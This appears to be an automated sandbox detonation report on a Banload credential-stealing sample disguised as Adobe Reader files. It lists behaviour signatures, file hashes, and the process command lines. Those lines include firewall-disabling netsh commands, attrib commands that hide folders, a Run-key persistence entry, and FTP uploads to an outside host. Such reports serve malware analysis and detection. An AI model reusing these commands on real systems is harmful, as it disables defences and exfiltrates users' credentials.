Analysis Overview
SHA256
92343dde0476af78ae32d87e36ef3584ce8d67b39bd23d61fb22537d05c3ed16
Threat Level: Known bad
The file df0fe6d7fb081b96253d736e786c51b6_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Modifies Windows Firewall
Sets file to hidden
Reads local data of messenger clients
Reads user/profile data of web browsers
Reads user/profile data of local email clients
Checks computer location settings
Loads dropped DLL
Checks BIOS information in registry
Executes dropped EXE
Adds Run key to start application
Accesses Microsoft Outlook accounts
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Gathers network information
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
NTFS ADS
Modifies registry class
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-09-13 23:03
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-13 23:03
Reported
2024-09-13 23:06
Platform
win7-20240903-en
Max time kernel
118s
Max time network
122s
Command Line
Signatures
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order details 20160623085116.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187} | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "Sharing Overlay (Private)" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InProcServer32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InProcServer32\ = "%SystemRoot%\\SysWow64\\ntshrui.dll" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InProcServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\DllHost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Order details 20160623085116.exe
"C:\Users\Admin\AppData\Local\Temp\Order details 20160623085116.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode disable
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set profiles state off
C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
AReader 5400
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ftp.freehostia.com | udp |
| US | 198.23.57.8:21 | ftp.freehostia.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs
| MD5 | ce8041824149d8266dbb0ad9688224d7 |
| SHA1 | 3ab653c43ce66681ceaab90193e1a4c95d998090 |
| SHA256 | 0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5 |
| SHA512 | e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat
| MD5 | 97410477dc9501dffca4ea4b1ae57273 |
| SHA1 | fb573b3bf4eba734b0f32db1a5b7ff78de36b064 |
| SHA256 | 3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c |
| SHA512 | 3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915 |
memory/2784-74-0x0000000000150000-0x0000000000152000-memory.dmp
memory/2728-73-0x0000000002380000-0x0000000002382000-memory.dmp
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq
| MD5 | 5f19a0e22cf5ffed07e18e2b00eb7641 |
| SHA1 | e219a8b8019a98399e6d14cedd5add82689806c5 |
| SHA256 | 37d2e60fc99be80debdd072be4e49f10f2d651c95ffd96d662d7c8581ae9bc72 |
| SHA512 | 777539e574400a3036602078c898be2d6803c5c4d12f92b506d374fa75c21d7b976082e5773a94367f69a66621d74e40ba1c3982ebcf693ed37180ae715d7423 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat
| MD5 | 89412aba215b6cd18b8a64c4485fa03f |
| SHA1 | 37089346499f54a7d89262a67d95c8764ab3ca1f |
| SHA256 | 9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1 |
| SHA512 | 7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe
| MD5 | 3351585db91521d6fa543490ac7cd6a5 |
| SHA1 | 9be2b3abf17613d7386f9949cabaedd466902e82 |
| SHA256 | 3f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4 |
| SHA512 | 804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe
| MD5 | 75a35514185cd2c5cf5aab50cc380963 |
| SHA1 | f1ff1e088f910398a48f4f7dfddec24e6d6d1734 |
| SHA256 | 1cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937 |
| SHA512 | ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs
| MD5 | 09082253605a7171f078e26dc308a667 |
| SHA1 | 585286c9fcda5e66e7fdb4e17a7bab6160183d46 |
| SHA256 | f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed |
| SHA512 | adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe
| MD5 | 97b8dbcc7b3cc290aef4241df911ac2e |
| SHA1 | 733ababbcd278821d4e3ee78580841981f26642e |
| SHA256 | c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023 |
| SHA512 | 4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe
| MD5 | 1a1075e5e307f3a4b8527110a51ce827 |
| SHA1 | f453838ed21020b7ca059244feea8579e5aa74ef |
| SHA256 | ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5 |
| SHA512 | b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat
| MD5 | ce7ccd3b48dbe8f34db3b2b1222e4fd9 |
| SHA1 | e25f9947c2b250c98dffd7bfeaca75b4db17dcfd |
| SHA256 | 6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e |
| SHA512 | ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99 |
memory/1452-126-0x00000000025D0000-0x0000000002884000-memory.dmp
memory/772-127-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1452-128-0x00000000025D0000-0x0000000002884000-memory.dmp
memory/2156-132-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/772-131-0x00000000024C0000-0x0000000002774000-memory.dmp
memory/2156-137-0x00000000026E0000-0x00000000028EC000-memory.dmp
memory/2156-133-0x00000000026E0000-0x00000000028EC000-memory.dmp
memory/2156-144-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2156-147-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2156-148-0x00000000026E0000-0x00000000028EC000-memory.dmp
memory/2156-146-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2156-145-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2156-157-0x00000000026E0000-0x00000000028EC000-memory.dmp
memory/772-159-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1452-166-0x00000000025D0000-0x0000000002887000-memory.dmp
memory/1308-165-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1452-164-0x00000000025D0000-0x0000000002887000-memory.dmp
memory/1308-169-0x0000000002550000-0x0000000002807000-memory.dmp
memory/1884-170-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1884-171-0x00000000025D0000-0x00000000027DC000-memory.dmp
memory/1884-175-0x00000000025D0000-0x00000000027DC000-memory.dmp
C:\ProgramData\TEMP\RAIDTest
| MD5 | c2f09542b6c7daf4288f3524c8cebb18 |
| SHA1 | 9430b21baf07f0d105b9ee5fdd9f868418454517 |
| SHA256 | 55d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4 |
| SHA512 | dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672 |
C:\ProgramData\Licenses\086A4C8982A52E70F.Lic
| MD5 | f346998c6594b1be038f50562ebb322f |
| SHA1 | 9220230e01f0450ec94581f55ef985ab945f88b8 |
| SHA256 | 751be99b9fee0d5c140e1522acbe10dbeedc4469946d72882d08043a5ac7af5b |
| SHA512 | 909e4a3720089b2c5c90824e48ef1bc6d8c60e62f725c0a99d11ab064f26614b47dc79cd73b139aa2fd09c5e40eda96d1d9324eda9b9a5e04b4e2490339f4f06 |
C:\ProgramData\TEMP:663565B1
| MD5 | 5a57a2a19653d4da95cf81d285ede8ae |
| SHA1 | 6c26a43b1d4cf171825cbfc3d30ac08f30d2e78d |
| SHA256 | 47c0e697043effbd0714a105dfffffff1df284d024776712ff2fddc612172588 |
| SHA512 | b7369a6f41b883acbada0b0f7a0134d3cc8e2471672371dcfe9cf6870e9f04774389eab235e16508e4e80eece9eaaae0ca7ab3df56dffe5c0bdfcfee9db2ccd6 |
memory/1884-187-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1884-186-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1884-188-0x00000000025D0000-0x00000000027DC000-memory.dmp
memory/1884-185-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1884-184-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1884-191-0x00000000025D0000-0x00000000027DC000-memory.dmp
memory/1884-196-0x00000000025D0000-0x00000000027DC000-memory.dmp
memory/1308-198-0x0000000000400000-0x00000000006B7000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011
| MD5 | e4bf4f7accc657622fe419c0d62419ab |
| SHA1 | c2856936dd3de05bad0da5ca94d6b521e40ab5a2 |
| SHA256 | b32fa68b79c5a7ceaa89e8e537efe33a963c499666202611329944bd2c09318e |
| SHA512 | 85dc223e39a16ddeba53a4b3d6c9eff14d30ec67dfda1e650da2c9057f640edd033a31868915a31caac0d325d240a7f634f62cd52fbd2adc68bd1d9cb6281431 |
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112
| MD5 | 3c305699054489d4ba953729549294b8 |
| SHA1 | 272b920622013b83dc073c26b75f5968663496c5 |
| SHA256 | 52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8 |
| SHA512 | 7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b |
memory/1452-205-0x00000000025D0000-0x0000000002887000-memory.dmp
memory/1452-212-0x00000000025D0000-0x0000000002887000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-13 23:03
Reported
2024-09-13 23:06
Platform
win10v2004-20240802-en
Max time kernel
112s
Max time network
116s
Command Line
Signatures
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
